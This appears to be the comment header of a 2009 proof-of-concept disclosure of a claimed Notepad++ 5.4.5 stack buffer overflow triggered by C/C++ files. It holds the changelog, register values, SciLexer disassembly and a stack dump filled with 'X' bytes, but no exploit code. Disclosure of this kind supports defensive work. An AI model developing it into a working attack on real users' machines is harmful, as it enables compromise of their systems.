# Title : Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow PoC (0day)
# Published : 2009-09-16
# Author : fl0 fl0w
/*
**************************************************************
(0day) Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow PoC
by fl0 fl0w
**************************************************************
*/
/*****************************************************************************************************
LATEST FIXES
Notepad++ v5.4.5 fixed bugs (from v5.4.4):
1. Fix plugins shortcuts not working bug.
2. Fix the tooltip on toolbar display bug for the plugins icons.
3. Fix a crash that was occurring when searching in files from a deep path.
4. Fix a crash issue (Unicode binary) while close Notepad++ with an RC file opened under Chinese Xp.
5. Fix Pascal and Scheme syntax highlighting problem (fixes in styles.xml).
6. Add SQL folding capacity.
******************************************************************************************************
*/
/***************************************************************************
This is the latest version of Notepad++.
As you can see, no buffer overflow bug is mentioned as existing or as having been fixed.
****************************************************************************
*/
/***********************************************************
DEBUGGING INFORMATION

CPU REGISTERS
EAX 00000000
ECX 003B74C4
EDX 00000000
EBX 0999A999
ESP 000E0764
EBP 000E0834
ESI 00B3D760
EDI 003B74B0
EIP 1000A258 SciLexer.1000A258

Function SciLexer() is causing this bug.
Let's look at the assembly instructions:

ASSEMBLY INSTRUCTIONS
1000A258 8910             MOV DWORD PTR DS:[EAX],EDX
1000A25A 8B45 F8          MOV EAX,DWORD PTR SS:[EBP-8]
1000A25D 8B80 60090000    MOV EAX,DWORD PTR DS:[EAX+960]
1000A263 8B80 B0010000    MOV EAX,DWORD PTR DS:[EAX+1B0]
1000A269 0FAF81 24060000  IMUL EAX,DWORD PTR DS:[ECX+624]
1000A270 2055 FF          AND BYTE PTR SS:[EBP-1],DL
1000A273 8945 C0          MOV DWORD PTR SS:[EBP-40],EAX
1000A276 8B41 10          MOV EAX,DWORD PTR DS:[ECX+10]
1000A279 05 6C0B0000      ADD EAX,0B6C
1000A27E 8945 CC          MOV DWORD PTR SS:[EBP-34],EAX
1000A281 33C0             XOR EAX,EAX
1000A283 6A 1F            PUSH 1F
1000A285 59               POP ECX

EDX=00000000
DS:[00000000]=???
************************************************************
*/
/*************************************************************
STACK
000BFEB4 004956A0 notepad+.004956A0
000BFEB8 F74B257B
000BFEBC FFFFFFFE
000BFEC0 58585858
000BFEC4 58585858
000BFEC8 58585858
000BFECC 58585858
000BFED0 58585858
000BFED4 58585858
000BFED8 58585858
000BFEDC 58585858
000BFEE0 58585858
000BFEE4 58585858
000BFEE8 58585858
000BFEEC 58585858
000BFEF4 58585858
000BFEF8 58585858
000BFEFC 58585858
000BFF00 58585858
000BFF04 58585858
000BFF0C 58585858
000BFF10 58585858
**************************************************************
*/